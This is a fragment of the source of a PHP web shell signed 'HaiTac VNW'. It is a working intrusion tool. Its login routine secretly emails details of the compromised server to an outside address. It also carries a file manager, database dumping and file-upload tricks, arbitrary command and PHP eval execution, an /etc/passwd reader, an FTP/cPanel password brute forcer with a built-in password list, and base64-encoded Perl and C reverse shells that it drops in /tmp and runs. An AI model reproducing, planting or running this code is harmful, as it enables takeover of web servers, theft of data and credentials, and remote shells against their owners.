$_value) { if ($_key{0} != '_') { if (IS_GPC) { $_value = s_array($_value); } $$_key = $_value; } } } /*================= Info Login ================*/ $admin = array(); $admin['check'] = true; $admin['pass'] = 'lamgico'; // Password login $admin['cookiepre'] = ''; $admin['cookiedomain'] = ''; $admin['cookiepath'] = '/'; $admin['cookielife'] = 86400; /*===================== End =====================*/ if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Login =====================*/ if ($action == "logout") { scookie('vbapass', '', -86400 * 365); p(''); p(''); exit; } if($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('vbapass', $password); $time_shell = "".date("d/m/Y - H:i:s").""; $ip_remote = $_SERVER["REMOTE_ADDR"]; $from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).''; $to_email = 'haitacvnw@host-dl.com'; $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST'].""; $linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\r\nReply-to: $from_shellcode"; @mail($to_email, $server_mail, $linkcr, $header); p(''); p('

Please Wait...
'); exit; } else { $err_mess = '
Sai mat khau roi. Lien he Haitac VNW
'; echo $err_mess; }} if ($_COOKIE['vbapass']) { if ($_COOKIE['vbapass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== Login =====================*/ $errmsg = ''; if ($action == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); } else { $errmsg = 'phpinfo() function has non-permissible'; } } if ($doing == 'downfile' && $thefile) { if (!@file_exists($thefile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $fileinfo = pathinfo($thefile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($thefile)); @readfile($thefile); exit; } } if ($doing == 'backupmysql' && !$saveasfile) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $table = array_flip($table); $result = q("SHOW tables"); if (!$result) p('

'.mysql_error().'

'); $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql'); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata .= sqldumptable($currow[0]); } } mysql_close(); exit; } // Mysql if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_angel;"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); //Download SQL q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); $result = q("select content from tmp_angel"); q("DROP TABLE tmp_angel"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?> <?php echo str_replace('.','','[localvn.biz]');?>
Loading
Hostname | Version 2.3 | LogoutON - "):("Safe_mod: OFF - ")); echo "PHP version: ".@phpversion()." - "; echo "cURL: ".(($curl_on)?("ON - "):("OFF - ")); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON - "; } else { echo "OFF - "; } echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON - ";}else{echo "OFF - ";} echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON - ";}else{echo "OFF - ";} echo "Oracle: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "ON";}else{echo "OFF
";} echo "Disable functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE
";}else{echo "$df
";} echo "Uname -a: ".@substr(@php_uname(),0,120)."
"; echo "Server: ".@substr($SERVER_SOFTWARE,0,120)." - id: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")
"; ?>

COPYRIGHT (C) 2011 By: HaiTac VNW

[Server IP: ".gethostbyname($_SERVER['SERVER_NAME'])."";?> - Your IP: ".$_SERVER['REMOTE_ADDR']."";?>] File Manager | MySQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Eval PHP Code | Brute | /etc/passwd | Back Connect | Fake mail
'); p(''); // Get path $dirdata=array(); $filedata=array(); if ($view_writable) { $dirdata = GetList($nowpath); } else { // Open dir $dirs=@opendir($dir); while ($file=@readdir($dirs)) { $filepath=$nowpath.$file; if(@is_dir($filepath)){ $dirdb['filename']=$file; $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $dirdb['dirchmod']=getChmod($filepath); $dirdb['dirperm']=getPerms($filepath); $dirdb['fileowner']=getUser($filepath); $dirdb['dirlink']=$nowpath; $dirdb['server_link']=$filepath; $dirdb['client_link']=ue($filepath); $dirdata[]=$dirdb; } else { $filedb['filename']=$file; $filedb['size']=sizecount(@filesize($filepath)); $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $filedb['filechmod']=getChmod($filepath); $filedb['fileperm']=getPerms($filepath); $filedb['fileowner']=getUser($filepath); $filedb['dirlink']=$nowpath; $filedb['server_link']=$filepath; $filedb['client_link']=ue($filepath); $filedata[]=$filedb; } }// while unset($dirdb); unset($filedb); @closedir($dirs); } @sort($dirdata); @sort($filedata); $dir_i = '0'; foreach($dirdata as $key => $dirdb){ if($dirdb['filename']!='..' && $dirdb['filename']!='.') { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $dir_i++; } else { if($dirdb['filename']=='..') { p(''); p(''); p(''); } } } p(''); p(''); makehide('action','file'); makehide('thefile'); makehide('doing'); makehide('dir',$nowpath); $file_i = '0'; foreach($filedata as $key => $filedb){ if($filedb['filename']!='..' && $filedb['filename']!='.') { $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']); $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $file_i++; } } p(''); p('
'goaction')); makehide('action'); formfoot(); $errmsg && m($errmsg); // Dir function !$dir && $dir = '.'; $nowpath = getPath(SA_ROOT, $dir); if (substr($dir, -1) != '/') { $dir = $dir.'/'; } $uedir = ue($dir); if (!$action || $action == 'file') { // Non-writeable $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; // Delete dir if ($doing == 'deldir' && $thefile) { if (!file_exists($thefile)) { m($thefile.' directory does not exist'); } else { m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed')); } } // Create new dir elseif ($newdirname) { $mkdirs = $nowpath.$newdirname; if (file_exists($mkdirs)) { m('Directory has already existed'); } else { m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); @chmod($mkdirs,0777); } } // Upload file elseif ($doupfile) { m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); } // Edit file elseif ($editfilename && $filecontent) { $fp = @fopen($editfilename,'w'); m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); @fclose($fp); } // Modify elseif ($pfile && $newperm) { if (!file_exists($pfile)) { m('The original file does not exist'); } else { $newperm = base_convert($newperm,8,10); m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); } } // Rename elseif ($oldname && $newfilename) { $nname = $nowpath.$newfilename; if (file_exists($nname) || !file_exists($oldname)) { m($nname.' has already existed or original file does not exist'); } else { m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed')); } } // Copu elseif ($sname && $tofile) { if (file_exists($tofile) || !file_exists($sname)) { m('The goal file has already existed or original file does not exist'); } else { m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); } } // File exit elseif ($curfile && $tarfile) { if (!@file_exists($curfile) || !@file_exists($tarfile)) { m('The goal file has already existed or original file does not exist'); } else { $time = @filemtime($tarfile); m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); } } // Date elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { if (!@file_exists($curfile)) { m(basename($curfile).' does not exist'); } else { $time = strtotime("$year-$month-$day $hour:$minute:$second"); m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); } } // Download elseif($doing == 'downrar') { if ($dl) { $dfiles=''; foreach ($dl as $filepath => $value) { $dfiles.=$filepath.','; } $dfiles=substr($dfiles,0,strlen($dfiles)-1); $dl=explode(',',$dfiles); $zip=new PHPZip($dl); $code=$zip->out; header('Content-type: application/octet-stream'); header('Accept-Ranges: bytes'); header('Accept-Length: '.strlen($code)); header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz'); echo $code; exit; } else { m('Please select file(s)'); } } // Delete file elseif($doing == 'delfiles') { if ($dl) { $dfiles=''; $succ = $fail = 0; foreach ($dl as $filepath => $value) { if (@unlink($filepath)) { $succ++; } else { $fail++; } } m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail); } else { m('Please select file(s)'); } } // Function Newdir formhead(array('name'=>'createdir')); makehide('newdirname'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileperm')); makehide('newperm'); makehide('pfile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'copyfile')); makehide('sname'); makehide('tofile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'rename')); makehide('oldname'); makehide('newfilename'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileopform')); makehide('action'); makehide('opfile'); makehide('dir'); formfoot(); $free = @disk_free_space($nowpath); !$free && $free = 0; $all = @disk_total_space($nowpath); !$all && $all = 0; $used = $all-$free; $used_percent = @round(100/($all/$free),2); p('File Manager Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)'); ?>
Current Directory (, )
'); p('
'); p('WebRoot'); if ($view_writable) { p(' | View All'); } else { p(' | View Writable'); } p(' | Create Directory | Create File'); if (IS_WIN && IS_COM) { $obj = new COM('scripting.filesystemobject'); if ($obj && is_object($obj)) { $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); foreach($obj->Drives as $drive) { if ($drive->DriveType == 2) { p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); } else { p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); } } } } p('
 FilenameLast modifiedSizeChmod / PermsAction
0'.$dirdb['filename'].''.$dirdb['mtime'].'--'); p(''.$dirdb['dirchmod'].' / '); p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Del | Rename
=Parent Directory
'.$filedb['filename'].''.$filedb['mtime'].''.$filedb['size'].''); p(''.$filedb['filechmod'].' / '); p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); p('Down | '); p('Copy | '); p('Edit | '); p('Rename | '); p('Time'); p('
Files.tar.gz download - Delete selected'.$dir_i.' directories / '.$file_i.' files
'); }// end dir elseif ($action == 'sqlfile') { if($doing=="mysqlupload"){ $file = $_FILES['uploadfile']; $filename = $file['tmp_name']; if (file_exists($savepath)) { m('The goal file has already existed'); } else { if(!$filename) { m('Please choose a file'); } else { $fp=@fopen($filename,'r'); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents = bin2hex($contents); if(!$upname) $upname = $file['name']; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); } } } ?> 'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); makehide('action','sqlfile'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); p('

'); formfoot(); p('
'); p('

Upload file

'); p('

This operation the DB user must has FILE privilege

'); p('

Save path(fullpath): Choose a file: Upload

'); p('

Download file

'); p('

File: Download

'); makehide('dbhost'); makehide('dbport'); makehide('dbuser'); makehide('dbpass'); makehide('dbname'); makehide('charset'); makehide('doing'); makehide('action','sqlfile'); p('
'); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $table = array_flip($table); $fp = @fopen($path,'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p('

'.mysql_error().'

'); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Manager')); makehide('action','sqladmin'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('

'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action','sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); // Data formhead(array('name'=>'setdbname')); makehide('action','sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name'=>'settable')); makehide('action','sqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); // get mysql server $mysqlver = mysql_get_server_info(); p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); $highver = $mysqlver > '4.1' ? 1 : 0; // Show database $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p('

'); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('

'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p('
'); p('

Run SQL query/queries on database '.$dbname.':
Example VBB Password: admin
UPDATE `user` SET `password` = \'21232f297a57a5a743894a0e4a801fc3\', salt = \'p5T\' WHERE `userid` = \'1\'

'); makehide('tablename', $tablename); makehide('action','sqladmin'); p($dbform); p('
'); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); foreach ($rowdb as $row) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); } tbfoot(); } elseif ($doing == 'insert' || $doing == 'edit') { $result = q('SHOW COLUMNS FROM '.$tablename); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } $rs = array(); if ($doing == 'insert') { p('

Insert new line in '.$tablename.' table »

'); } else { p('

Update record in '.$tablename.' table »

'); $where = base64_decode($base64); $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); $rs = mysql_fetch_array($result); } p(''); p($dbform); makehide('action','sqladmin'); makehide('tablename',$tablename); p('
FieldTypeNullKeyDefaultExtra
'.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
'); foreach ($rowdb as $row) { if ($rs[$row['Field']]) { $value = htmlspecialchars($rs[$row['Field']]); } else { $value = ''; } $thisbg = bg(); p(''); p(''); } if ($doing == 'insert') { p(''); } else { p(''); makehide('base64', $base64); } p('
'.$row['Field'].'
'.$row['Type'].'
'); } else { $querys = @explode(';',$sql_query); foreach($querys as $num=>$query) { if ($query) { p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); switch(qy($query)) { case 0: p('

Error : '.mysql_error().'

'); break; case 1: if (strtolower(substr($query,0,13)) == 'select * from') { $allowedit = 1; } if ($getnumsql) { $tatol = mysql_num_rows(q($getnumsql)); $multipage = multi($tatol, $pagenum, $page, $tablename); } if (!$tablename) { $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); $tablename = $matches[1][0]; } $result = q($query); p($multipage); p(''); p(''); if ($allowedit) p(''); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p(""); } p(''); while($mn = @mysql_fetch_assoc($result)){ $thisbg = bg(); p(''); $where = $tmp = $b1 = ''; foreach($mn as $key=>$inside){ if ($inside) { $where .= $tmp.$key."='".addslashes($inside)."'"; $tmp = ' AND '; } $b1 .= ''; } $where = base64_encode($where); if ($allowedit) p(''); p($b1); p(''); unset($b1); } tbfoot(); p($multipage); break; case 2: $ar = mysql_affected_rows(); p('

affected rows : '.$ar.'

'); break; } } } } } else { $query = q("SHOW TABLE STATUS"); $table_num = $table_rows = $data_size = 0; $tabledb = array(); while($table = mysql_fetch_array($query)) { $data_size = $data_size + $table['Data_length']; $table_rows = $table_rows + $table['Rows']; $table['Data_length'] = sizecount($table['Data_length']); $table_num++; $tabledb[] = $table; } $data_size = sizecount($data_size); unset($table); p('
Action$name
$type($len)
'.html_clean($inside).' Edit | Del
'); p(''); makehide('action','sqladmin'); p($dbform); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); foreach ($tabledb as $key => $table) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(""); makehide('doing','backupmysql'); formfoot(); p("
NameRowsData_lengthCreate_timeUpdate_timeEngineCollation
'.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
"); fr($query); } } } tbfoot(); @mysql_close(); }//end sql backup elseif ($action == 'backconnect') { !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; !$yourport && $yourport = '12345'; $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use){ if ($use == 'perl') { cf('/tmp/angel_bc',$back_connect); $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); } else { cf('/tmp/angel_bc.c',$back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc $yourip $yourport &"); } m("Now script try connect to $yourip port $yourport ..."); } formhead(array('title'=>'Back Connect')); makehide('action','backconnect'); p('

'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('

'); formfoot(); }//end backconnect window via NC // Brute elseif ($action == 'brute') { formhead(array('title'=>'Brute Forcer')); makehide('action','brute'); makehide('dir',$brute); @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $passlist = "0123456 01234567 012345678 0123456789 01234567890 123456 1234567 12345678 123456789 1234567890 111111 000000 222222 333333 444444 555555 666666 777777 888888 999999 123123 456456 789789 123321 456654 654321 7654321 87654321 987654321 0987654321 admin administrator admincp cpanel adminx admins password passwords passw0rd p@ssw0rd p@ssword khongco 25251325 passw0rds"; if($target == ''){ $target = 'localhost'; } print "


Target :


Username

Password



Options : cPanel ftp ==>

"; ?> Error : Connection timed out , make confidence about validation of target !"; exit;} elseif ( curl_errno($ch) == 0 ){ p("[ haitacvnw@host-dl.com ]# Attacking has been done! Username: $user / Password: $pass => Login
"); } curl_close($ch);} function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Error : Connection timed out , make confidence about validation of target !"; exit;} elseif ( curl_errno($ch) == 0 ){ p("[ haitacvnw@host-dl.com ]# Attacking has been done! Username: $user / Password: $pass
");}curl_close($ch);} if(isset($submit) && !empty($submit)){ $userlist = explode ("\n" , $users ); $passlist = explode ("\n" , $pass ); p('[ haitacvnw@host-dl.com ]# Attacking ...
'); foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } formfoot(); } elseif ($action == 'etcpwd') { formhead(array('title'=>'Get /etc/passwd')); makehide('action','etcpwd'); makehide('dir',$nowpath); $i = 0; echo "


"; formfoot(); } elseif ($action == 'eval') { $phpcode = trim($phpcode); if($phpcode){ if (!preg_match('#<\?#si', $phpcode)) { $phpcode = ""; } eval("?".">$phpcode'Eval PHP Code')); makehide('action','eval'); maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); p('

Get plugins

